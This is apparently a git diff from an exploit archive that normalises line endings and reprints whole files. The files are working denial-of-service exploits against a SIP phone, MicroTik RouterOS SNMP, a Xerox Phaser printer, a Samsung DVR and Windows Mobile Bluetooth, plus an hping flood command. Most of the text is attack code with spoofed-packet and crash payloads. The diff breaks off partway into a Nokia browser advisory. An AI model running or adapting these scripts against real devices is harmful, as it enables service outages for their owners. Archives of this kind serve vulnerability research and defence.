@@ -1,89 +1,89 @@ -#!/usr/bin/perl - - -############################### -# Vulnerabily discovered using KiF ~ Kiph -# -# Authors: -# Humberto J. Abdelnur (Ph.D Student) -# Radu State (Ph.D) -# Olivier Festor (Ph.D) -# -# Madynes Team, LORIA - INRIA Lorraine -# http://madynes.loria.fr -############################### -use IO::Socket::INET; -use String::Random; -die "Usage $0 " -unless ($ARGV[3]); -$targetUser = $ARGV[1]; -$targetIP = $ARGV[0]; -$attackerUser = $ARGV[3]; -$attackerIP= $ARGV[2]; -$socket=new IO::Socket::INET->new( -Proto=>'udp', -PeerPort=>5060, -PeerAddr=>$targetIP, -LocalPort=>5060); -$foo = new String::Random; -$flag = 0; -@calls; -$threads = 0; -while ($flag == 0){ -$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP"; -$cseq = $foo->randregex('\d\d\d\d'); -$msg = "INVITE sip:$targetIP SIP/2.0\r -Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r -From: ;tag=1\r -To: \r -Call-ID:$callid\r -CSeq: $cseq INVITE\r -Max-Forwards: 70\r -Contact: \r -Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, -MESSAGE\r -Content-Length: 0\r -\r -"; -$socket->send($msg); -$socket->recv($text,1024,0); -if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){ -push(@calls, $callid); -sleep(1); -}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){ -if ($thread == 0){ -$thread = scalar(@calls); -} -while (scalar(@calls) ge $thread){ -$toTag = $cseq= $callid= $text; -$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/; - -$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/; -$cseq =~ s/^(.*\r\n)*CSeq: (.*?) 
(.*?)\r\n(.*\r\n)*/\2/; -$msg = "ACK sip:$targetIP SIP/2.0\r -Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r -From: ;tag=1\r -To: $toTag\r -Call-ID:$callid\r -CSeq: $cseq ACK\r -Contact: \r -Content-Length: 0\r -\r -"; -$socket->send($msg); -$i= 0; -while ($i < scalar(@calls)){ -if (@calls[$i] eq $callid){ -delete @calls[$i]; -}else{ -$i += 1; -} -} -if (scalar(@calls) ge $thread){ -$socket->recv($text,1024,0); -} -} -} -} - -# milw0rm.com [2007-12-05] +#!/usr/bin/perl + + +############################### +# Vulnerabily discovered using KiF ~ Kiph +# +# Authors: +# Humberto J. Abdelnur (Ph.D Student) +# Radu State (Ph.D) +# Olivier Festor (Ph.D) +# +# Madynes Team, LORIA - INRIA Lorraine +# http://madynes.loria.fr +############################### +use IO::Socket::INET; +use String::Random; +die "Usage $0 " +unless ($ARGV[3]); +$targetUser = $ARGV[1]; +$targetIP = $ARGV[0]; +$attackerUser = $ARGV[3]; +$attackerIP= $ARGV[2]; +$socket=new IO::Socket::INET->new( +Proto=>'udp', +PeerPort=>5060, +PeerAddr=>$targetIP, +LocalPort=>5060); +$foo = new String::Random; +$flag = 0; +@calls; +$threads = 0; +while ($flag == 0){ +$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP"; +$cseq = $foo->randregex('\d\d\d\d'); +$msg = "INVITE sip:$targetIP SIP/2.0\r +Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r +From: ;tag=1\r +To: \r +Call-ID:$callid\r +CSeq: $cseq INVITE\r +Max-Forwards: 70\r +Contact: \r +Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, +MESSAGE\r +Content-Length: 0\r +\r +"; +$socket->send($msg); +$socket->recv($text,1024,0); +if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){ +push(@calls, $callid); +sleep(1); +}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){ +if ($thread == 0){ +$thread = scalar(@calls); +} +while (scalar(@calls) ge $thread){ +$toTag = $cseq= $callid= $text; +$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/; + +$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/; +$cseq =~ s/^(.*\r\n)*CSeq: (.*?) 
(.*?)\r\n(.*\r\n)*/\2/; +$msg = "ACK sip:$targetIP SIP/2.0\r +Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r +From: ;tag=1\r +To: $toTag\r +Call-ID:$callid\r +CSeq: $cseq ACK\r +Contact: \r +Content-Length: 0\r +\r +"; +$socket->send($msg); +$i= 0; +while ($i < scalar(@calls)){ +if (@calls[$i] eq $callid){ +delete @calls[$i]; +}else{ +$i += 1; +} +} +if (scalar(@calls) ge $thread){ +$socket->recv($text,1024,0); +} +} +} +} + +# milw0rm.com [2007-12-05] diff --git a/platforms/hardware/dos/4978.html b/platforms/hardware/dos/4978.html index 462064105..744406da4 100755 --- a/platforms/hardware/dos/4978.html +++ b/platforms/hardware/dos/4978.html @@ -1,34 +1,34 @@ - - - - - - -# milw0rm.com [2008-01-24] + + + + + + +# milw0rm.com [2008-01-24] diff --git a/platforms/hardware/dos/5054.c b/platforms/hardware/dos/5054.c index a822dcd35..5d7c7e527 100755 --- a/platforms/hardware/dos/5054.c +++ b/platforms/hardware/dos/5054.c 
@@ -1,200 +1,200 @@ -/* -------------------------------------------------------------------------- -* (c) ShadOS 2008 -* _ _ _ _ _ __ _ _ _ -* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ -* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< -* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ -* hellknights.void.ru |___/ .0x48k. -* -* -------------------------------------------------------------------------- -* -* MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux ) -* Don't forget to visit our site and my homepage for new releases: -* http://hellknights.void.ru -* http://shados.freeweb7.com -* Also, you can mail me any bugs or suggestions: -* mailto: shados /at/ mail /dot/ ru -* -* Thanks 2 antichat.ru and all my friends. -* -------------------------------------------------------------------------- -* -* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation. -* -* This program is free software; you can redistribute it and/or modify -* it under the terms of the GNU General Public License as published by -* the Free Software Foundation; either version 2, or (at your option) -* any later version. -* -* This program is distributed in the hope that it will be useful, -* but WITHOUT ANY WARRANTY; without even the implied warranty of -* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -* GNU General Public License for more details. -* -* You should have received a copy of the GNU General Public License -* along with this program; if not, write to the Free Software Foundation, -* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
-* -* -------------------------------------------------------------------------- -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -char evilcode[] = { -0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00 -}; - - -unsigned short in_cksum(addr, len) -u_short *addr; -int len; -{ - register int nleft = len; - register u_short *w = addr; - register int sum = 0; - u_short answer = 0; - - while (nleft > 1) { - sum += *w++; - sum += *w++; - nleft -= 2; - } - if (nleft == 1) { - *(u_char *) (&answer) = *(u_char *) w; - sum += answer; - } - sum = (sum >> 17) + (sum & 0xffff); - sum += (sum >> 17); - answer = -sum; - return (answer); -} - -int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) -{ - char *packet; - struct sockaddr_in dstaddr; - struct iphdr *ip; - struct udphdr *udp; - packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len); - memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len); - if (packet == NULL) { perror("Malloc failed\n"); exit(-1); } - ip = (struct iphdr *)packet; - udp = (struct udphdr *)(packet+sizeof(struct iphdr)); - ip->saddr = *saddr; - ip->daddr = *daddr; - ip->version = 4; - ip->ihl = 5; - ip->ttl = 255; - ip->id = htons((unsigned short) rand()); - ip->protocol = IPPROTO_UDP; - ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len); - ip->check = in_cksum(ip, sizeof(struct iphdr)); - udp->source = htons(sport); - udp->dest = htons(dport); - udp->len = htons(sizeof(struct udphdr) + len); - memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len); - dstaddr.sin_family = AF_INET; - dstaddr.sin_addr.s_addr = *daddr; - if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0) - 
perror("sendto() failed"); - free(packet); -} - -char * makereq(char *community,int *size) -{ - char *buf; - char *ptr; - int len; - int i; - - len = 5 + strlen(community) + sizeof(evilcode); - buf = (char *)malloc(len); - ptr = buf; - - *ptr++ = 0x30; - *ptr++ = len; - - /* Snmp Version */ - *ptr++ = 0x02; - *ptr++ = 0x01; - *ptr++ = 0x00; - - /* Community */ - *ptr++ = 0x04; - *ptr++ = strlen(community); - strcpy(ptr,community); - ptr = ptr + strlen(community); - - - *ptr++ = 0xa3; /* Set Request */ - - memcpy(ptr, evilcode, sizeof(evilcode)); - ptr = ptr + sizeof(evilcode); - - *size = len+2; - return buf; -} - -int erexit(char *msg) -{ - printf("%s\n",msg); - exit (-1) ; -} - -int usage() -{ - printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n"); -} - -int main(int argc, char **argv) -{ - char *saddr,*daddr,*community; - unsigned char *buf; - int size; - int sock; - unsigned long lsaddr,ldaddr; - int i; - - saddr = NULL; - daddr = NULL; - if (argc != 7) { usage(); erexit("not enough args\n"); } - - if (!strcmp(argv[1],"-s")) - saddr = strdup(argv[2]); - if (!strcmp(argv[3],"-d")) - daddr = strdup(argv[4]); - if (!strcmp(argv[5],"-c")) - community = strdup(argv[6]); - - printf("Ok, spoofing packets from %s to %s\n",saddr,daddr); - - if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1) - erexit("Invalid source/destination IP address\n"); - - if (saddr == NULL) { usage(); erexit("No Source Address"); } - if (daddr == NULL) { usage(); erexit("No Dest Address"); } - - sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); - if (sock == -1) - erexit("Couldnt open Raw socket!(Are you root?)\n"); - - lsaddr = inet_addr(saddr); - ldaddr = inet_addr(daddr); - - buf = makereq(community,&size); - - sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size); - fprintf(stdout,"Sent packet. 
SNMPd must be down.\n"); - return 0; - -} - -// milw0rm.com [2008-02-03] +/* -------------------------------------------------------------------------- +* (c) ShadOS 2008 +* _ _ _ _ _ __ _ _ _ +* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ +* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< +* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ +* hellknights.void.ru |___/ .0x48k. +* +* -------------------------------------------------------------------------- +* +* MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux ) +* Don't forget to visit our site and my homepage for new releases: +* http://hellknights.void.ru +* http://shados.freeweb7.com +* Also, you can mail me any bugs or suggestions: +* mailto: shados /at/ mail /dot/ ru +* +* Thanks 2 antichat.ru and all my friends. +* -------------------------------------------------------------------------- +* +* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation. +* +* This program is free software; you can redistribute it and/or modify +* it under the terms of the GNU General Public License as published by +* the Free Software Foundation; either version 2, or (at your option) +* any later version. +* +* This program is distributed in the hope that it will be useful, +* but WITHOUT ANY WARRANTY; without even the implied warranty of +* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +* GNU General Public License for more details. +* +* You should have received a copy of the GNU General Public License +* along with this program; if not, write to the Free Software Foundation, +* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+* +* -------------------------------------------------------------------------- +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +char evilcode[] = { +0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00 +}; + + +unsigned short in_cksum(addr, len) +u_short *addr; +int len; +{ + register int nleft = len; + register u_short *w = addr; + register int sum = 0; + u_short answer = 0; + + while (nleft > 1) { + sum += *w++; + sum += *w++; + nleft -= 2; + } + if (nleft == 1) { + *(u_char *) (&answer) = *(u_char *) w; + sum += answer; + } + sum = (sum >> 17) + (sum & 0xffff); + sum += (sum >> 17); + answer = -sum; + return (answer); +} + +int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) +{ + char *packet; + struct sockaddr_in dstaddr; + struct iphdr *ip; + struct udphdr *udp; + packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len); + memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len); + if (packet == NULL) { perror("Malloc failed\n"); exit(-1); } + ip = (struct iphdr *)packet; + udp = (struct udphdr *)(packet+sizeof(struct iphdr)); + ip->saddr = *saddr; + ip->daddr = *daddr; + ip->version = 4; + ip->ihl = 5; + ip->ttl = 255; + ip->id = htons((unsigned short) rand()); + ip->protocol = IPPROTO_UDP; + ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len); + ip->check = in_cksum(ip, sizeof(struct iphdr)); + udp->source = htons(sport); + udp->dest = htons(dport); + udp->len = htons(sizeof(struct udphdr) + len); + memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len); + dstaddr.sin_family = AF_INET; + dstaddr.sin_addr.s_addr = *daddr; + if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0) + 
perror("sendto() failed"); + free(packet); +} + +char * makereq(char *community,int *size) +{ + char *buf; + char *ptr; + int len; + int i; + + len = 5 + strlen(community) + sizeof(evilcode); + buf = (char *)malloc(len); + ptr = buf; + + *ptr++ = 0x30; + *ptr++ = len; + + /* Snmp Version */ + *ptr++ = 0x02; + *ptr++ = 0x01; + *ptr++ = 0x00; + + /* Community */ + *ptr++ = 0x04; + *ptr++ = strlen(community); + strcpy(ptr,community); + ptr = ptr + strlen(community); + + + *ptr++ = 0xa3; /* Set Request */ + + memcpy(ptr, evilcode, sizeof(evilcode)); + ptr = ptr + sizeof(evilcode); + + *size = len+2; + return buf; +} + +int erexit(char *msg) +{ + printf("%s\n",msg); + exit (-1) ; +} + +int usage() +{ + printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n"); +} + +int main(int argc, char **argv) +{ + char *saddr,*daddr,*community; + unsigned char *buf; + int size; + int sock; + unsigned long lsaddr,ldaddr; + int i; + + saddr = NULL; + daddr = NULL; + if (argc != 7) { usage(); erexit("not enough args\n"); } + + if (!strcmp(argv[1],"-s")) + saddr = strdup(argv[2]); + if (!strcmp(argv[3],"-d")) + daddr = strdup(argv[4]); + if (!strcmp(argv[5],"-c")) + community = strdup(argv[6]); + + printf("Ok, spoofing packets from %s to %s\n",saddr,daddr); + + if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1) + erexit("Invalid source/destination IP address\n"); + + if (saddr == NULL) { usage(); erexit("No Source Address"); } + if (daddr == NULL) { usage(); erexit("No Dest Address"); } + + sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); + if (sock == -1) + erexit("Couldnt open Raw socket!(Are you root?)\n"); + + lsaddr = inet_addr(saddr); + ldaddr = inet_addr(daddr); + + buf = makereq(community,&size); + + sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size); + fprintf(stdout,"Sent packet. SNMPd must be down.\n"); + return 0; + +} + +// milw0rm.com [2008-02-03] diff --git a/platforms/hardware/dos/59.c b/platforms/hardware/dos/59.c index d9b82d78e..97e9a2f83 100755 
--- a/platforms/hardware/dos/59.c +++ b/platforms/hardware/dos/59.c @@ -125,6 +125,6 @@ ls.packets_sent, ls.packet_errors, ls.bytes_written); CLEANUP; return (0); -} - -// milw0rm.com [2003-07-18] +} + +// milw0rm.com [2003-07-18] diff --git a/platforms/hardware/dos/60.c b/platforms/hardware/dos/60.c index d117653ea..cdfd018a7 100755 --- a/platforms/hardware/dos/60.c +++ b/platforms/hardware/dos/60.c @@ -208,6 +208,6 @@ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } - - -// milw0rm.com [2003-07-21] + + +// milw0rm.com [2003-07-21] diff --git a/platforms/hardware/dos/6196.pl b/platforms/hardware/dos/6196.pl index 0f2f4f280..fede1afcb 100755 --- a/platforms/hardware/dos/6196.pl +++ b/platforms/hardware/dos/6196.pl 
@@ -1,37 +1,37 @@ -#!/usr/bin/perl -# carved-out by: crit3rion, just making th3 world a b3tt3r plac3! -# Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t) -# Make: Xerox -# Model: Phaser 8400 -# Firmware: 03/03/2004 -# -# What's the deal? -# Apparently, if you send an empty packet to a Xerox Phaser 8400 printer -# the printer will reboot. Tested successfully on four printers. -# - -# Let's not leave our maliciousness open to exploitation and errors! -use strict; -use warnings; -use IO::Socket::INET; - -# What's your printer's IP Address? -print "Please enter the printers IP:\n"; -my $ipaddr = ; -chomp $ipaddr; - -# Let's setup the connection... -my $socket = IO::Socket::INET->new( - PeerPort => 1900, - PeerAddr => $ipaddr, - Proto => "udp" ) - or die "I tried. Maybe you entered the wrong IP?\n Maybe it's just my bad code...\n In any case, check: $@\n\n"; - -# Okay... Let's kill it. -$socket->send(""); -$socket->close(); - -print "Done. It should have died.\n\n"; -exit(1); - -# milw0rm.com [2008-08-03] +#!/usr/bin/perl +# carved-out by: crit3rion, just making th3 world a b3tt3r plac3! +# Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t) +# Make: Xerox +# Model: Phaser 8400 +# Firmware: 03/03/2004 +# +# What's the deal? +# Apparently, if you send an empty packet to a Xerox Phaser 8400 printer +# the printer will reboot. Tested successfully on four printers. +# + +# Let's not leave our maliciousness open to exploitation and errors! +use strict; +use warnings; +use IO::Socket::INET; + +# What's your printer's IP Address? +print "Please enter the printers IP:\n"; +my $ipaddr = ; +chomp $ipaddr; + +# Let's setup the connection... +my $socket = IO::Socket::INET->new( + PeerPort => 1900, + PeerAddr => $ipaddr, + Proto => "udp" ) + or die "I tried. Maybe you entered the wrong IP?\n Maybe it's just my bad code...\n In any case, check: $@\n\n"; + +# Okay... Let's kill it. 
+$socket->send(""); +$socket->close(); + +print "Done. It should have died.\n\n"; +exit(1); + +# milw0rm.com [2008-08-03] diff --git a/platforms/hardware/dos/62.sh b/platforms/hardware/dos/62.sh index 1a09e6b4b..9a29c740e 100755 --- a/platforms/hardware/dos/62.sh +++ b/platforms/hardware/dos/62.sh @@ -45,6 +45,6 @@ endif foreach protocol (53) /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26 -end - -# milw0rm.com [2003-07-22] +end + +# milw0rm.com [2003-07-22] diff --git a/platforms/hardware/dos/6394.pl b/platforms/hardware/dos/6394.pl index 5c096c302..f16ebc113 100755 --- a/platforms/hardware/dos/6394.pl +++ b/platforms/hardware/dos/6394.pl 
@@ -1,91 +1,91 @@ -#!/usr/bin/perl -w -# -# Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC -# -# The vulnerability is caused due to an unspecified error in the cgis -# files filter used for configure propierties. This can be exploited by -# sending a specially crafted HTTP request (NO necessary authentication), -# which will cause the HTTP service on the system to crash. -# -# Requisites: Test default ports: -# -# PORT STATE SERVICE -# 554/tcp open rtsp -# 557/tcp open openvms-sysipc -# -# The vulnerability has been reported in versions Samsung DVR -# -# Firmware Version B3.03E-K1.53-V2.19_0705281908, Model = SHR2040 -# -# More information: http://www.samsung.com -# http://www.sybsecurity.com -# -# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd. -# -# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, -# pikah, codebreak, h3llfyr3, canit0. -# -# Alex Hernandez ahernandez [at] sybsecurity dot com -# - -use strict; -use LWP; -use Data::Dumper; -require HTTP::Request; -require HTTP::Headers; - -my $string = "/x"; # Strings to send -my $method = 'GET'; # Method "GET" or "POST" -my $uri = 'http://10.50.10.248:557'; # IP address:port (change this) -my $content = "/test.html"; # Paths to crash - -#my $content = "/first.htm"; -#my $content = "/content_frame.htm?cgiName="; -#my $content = "/index_menu.htm?lang=en&topMenu="; - -my $headers = HTTP::Headers->new( - -'Accept:' => '*/*', -'Referer:' => 'http://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:12345@10.50.10.248:557', -'Accept-Language:' => 'en-us,en;q=0.5', -'UA-CPU:' => 'x86', -'Accept-Encoding:' => 'gzip, deflate', -'User-Agent:' => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', -'Host:' => '10.50.10.248:557', -'Connection' => 'keep-alive', -'Authorization:' => 'Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==', # base64 encode ADMIN:12345 - -); - -my $request = HTTP::Request->new($method, $uri, $headers, 
$content, $string); - -my $ua = LWP::UserAgent->new; -my $response = $ua->request($request); - -print "[+] Denial of Service exploit for Samsung SHR2040 Final\n"; -print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; -print "[+] We got this response from DVR: \n\n" . $response->content . "\n"; - -my $data; - foreach my $pair (split('&', $response->content)) { - my ($k, $v) = split('=', $pair); - $data->{$k} = $v; -} - -if ($data->{RESULT} != 0) { - - print "[+] Denial of Service exploit for Samsung SHR2040 Final\n"; - print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; - print "[+] Use:\n"; - print "\tperl -x dos_dvrsamsung.pl\n"; - print $data->{RESPMSG} . "\n"; - exit(0); - -} else { - - print "[+] Denial of service Exploit successed!!!\n"; - print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; - -} - -# milw0rm.com [2008-09-07] +#!/usr/bin/perl -w +# +# Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC +# +# The vulnerability is caused due to an unspecified error in the cgis +# files filter used for configure propierties. This can be exploited by +# sending a specially crafted HTTP request (NO necessary authentication), +# which will cause the HTTP service on the system to crash. +# +# Requisites: Test default ports: +# +# PORT STATE SERVICE +# 554/tcp open rtsp +# 557/tcp open openvms-sysipc +# +# The vulnerability has been reported in versions Samsung DVR +# +# Firmware Version B3.03E-K1.53-V2.19_0705281908, Model = SHR2040 +# +# More information: http://www.samsung.com +# http://www.sybsecurity.com +# +# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd. +# +# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, +# pikah, codebreak, h3llfyr3, canit0. 
+# +# Alex Hernandez ahernandez [at] sybsecurity dot com +# + +use strict; +use LWP; +use Data::Dumper; +require HTTP::Request; +require HTTP::Headers; + +my $string = "/x"; # Strings to send +my $method = 'GET'; # Method "GET" or "POST" +my $uri = 'http://10.50.10.248:557'; # IP address:port (change this) +my $content = "/test.html"; # Paths to crash + +#my $content = "/first.htm"; +#my $content = "/content_frame.htm?cgiName="; +#my $content = "/index_menu.htm?lang=en&topMenu="; + +my $headers = HTTP::Headers->new( + +'Accept:' => '*/*', +'Referer:' => 'http://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:12345@10.50.10.248:557', +'Accept-Language:' => 'en-us,en;q=0.5', +'UA-CPU:' => 'x86', +'Accept-Encoding:' => 'gzip, deflate', +'User-Agent:' => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', +'Host:' => '10.50.10.248:557', +'Connection' => 'keep-alive', +'Authorization:' => 'Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==', # base64 encode ADMIN:12345 + +); + +my $request = HTTP::Request->new($method, $uri, $headers, $content, $string); + +my $ua = LWP::UserAgent->new; +my $response = $ua->request($request); + +print "[+] Denial of Service exploit for Samsung SHR2040 Final\n"; +print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; +print "[+] We got this response from DVR: \n\n" . $response->content . "\n"; + +my $data; + foreach my $pair (split('&', $response->content)) { + my ($k, $v) = split('=', $pair); + $data->{$k} = $v; +} + +if ($data->{RESULT} != 0) { + + print "[+] Denial of Service exploit for Samsung SHR2040 Final\n"; + print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; + print "[+] Use:\n"; + print "\tperl -x dos_dvrsamsung.pl\n"; + print $data->{RESPMSG} . "\n"; + exit(0); + +} else { + + print "[+] Denial of service Exploit successed!!!\n"; + print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; + +} + +# milw0rm.com [2008-09-07] 
diff --git a/platforms/hardware/dos/6582.pl b/platforms/hardware/dos/6582.pl
index c3e622e8a..a14b13476 100755
--- a/platforms/hardware/dos/6582.pl
+++ b/platforms/hardware/dos/6582.pl
@@ -1,44 +1,44 @@
-#!/usr/bin/perl
-#
-# ----------WM6 remote overflow reboot PoC----------
-# Simple exploit for remote rebooting a windows mobile device
-# Maybe we can use it for doing command execution,
-# I've not test it since the device is rebooting and do not dump a core
-# for further analysing.
-#
-# The bug is not realy in the long string name but when it's the first
-# time the wm6 device try to get a connection with too long name.
-#
-# There's two way to exploit this bug, this PoC show the first method
-# (direct connect to the device if we know the bdaddr) but you can
-# just wait for the device to search and overflow by itself when
-# seeing the hci name:
-# hciconfig name `perl -e 'print "A"x90000'`
-# hciconfig piscan
-# You just have to wait until the wm device search for bluetooth devices
-# in range and it will be overflowed
-#
-# *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125]
-# (by Julien Bedard)
-#
-
-use Net::Bluetooth;
-
-$target=$ARGV[0];
-$hci_dev=$ARGV[1];
-$overflow="A" x 90000;
-$rfcomm_port="3";
-
-if (@ARGV < 2)
-{
-die "Usage:\n ./wm6_dos.pl \n\n";
-}
-
-# change this lame cmd ???
-system("hciconfig $hci_dev name $overflow");
-
-$over_conn = Net::Bluetooth->newsocket("RFCOMM");
-print "socket error $!\n" unless(defined($over_conn));
-$over_conn->connect($target, $rfcomm_port);
-
-# milw0rm.com [2008-09-26]
+#!/usr/bin/perl
+#
+# ----------WM6 remote overflow reboot PoC----------
+# Simple exploit for remote rebooting a windows mobile device
+# Maybe we can use it for doing command execution,
+# I've not test it since the device is rebooting and do not dump a core
+# for further analysing.
+#
+# The bug is not realy in the long string name but when it's the first
+# time the wm6 device try to get a connection with too long name.
+#
+# There's two way to exploit this bug, this PoC show the first method
+# (direct connect to the device if we know the bdaddr) but you can
+# just wait for the device to search and overflow by itself when
+# seeing the hci name:
+# hciconfig name `perl -e 'print "A"x90000'`
+# hciconfig piscan
+# You just have to wait until the wm device search for bluetooth devices
+# in range and it will be overflowed
+#
+# *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125]
+# (by Julien Bedard)
+#
+
+use Net::Bluetooth;
+
+$target=$ARGV[0];
+$hci_dev=$ARGV[1];
+$overflow="A" x 90000;
+$rfcomm_port="3";
+
+if (@ARGV < 2)
+{
+die "Usage:\n ./wm6_dos.pl \n\n";
+}
+
+# change this lame cmd ???
+system("hciconfig $hci_dev name $overflow");
+
+$over_conn = Net::Bluetooth->newsocket("RFCOMM");
+print "socket error $!\n" unless(defined($over_conn));
+$over_conn->connect($target, $rfcomm_port);
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/hardware/dos/6726.txt b/platforms/hardware/dos/6726.txt
index 12df72623..6224f0e08 100755
--- a/platforms/hardware/dos/6726.txt
+++ b/platforms/hardware/dos/6726.txt
@@ -1,103 +1,103 @@ -==================================================== -Security Research Advisory - -Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability -Advisory number: LC-2008-04 -Advisory URL: http://www.ikkisoft.com - -==================================================== -1) Affected Software - -* Nokia Mini Map Browser (S60WebKit <= 21772) - -The tested device has the following User-Agent: -Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75 -Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML) -Safari/413 - -Note: Although the Nokia Web Browser is built upon a port of the -open source WebKit used by Apple for its browser, the iPhone is not -affected (at least the iPhone firmware version 2.0.2(5C1)) - -==================================================== -2) Severity - -Severity: Low -Local/Remote: Remote - -==================================================== -3) Summary - -The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web -browser for the S60 mobile phone platform developed by Nokia. -It is built upon S60WebKit, a port of the open source WebKit project to the S60 -platform. According to several sources, the S60 software on Symbian OS is the -world’s most popular software for smartphones. - -This version of the Nokia Mini Map Browser does not properly validate JavaScript -input embedded in visited HTML pages. An aggressor can easily trigger Denial of -Service attacks. - -References: -http://opensource.nokia.com/projects/S60browser/ -http://en.wikipedia.org/wiki/Web_Browser_for_S60 - -==================================================== -4) Vulnerability Details - -The Nokia Mini Map Browser is prone to a vulnerability that may result in the 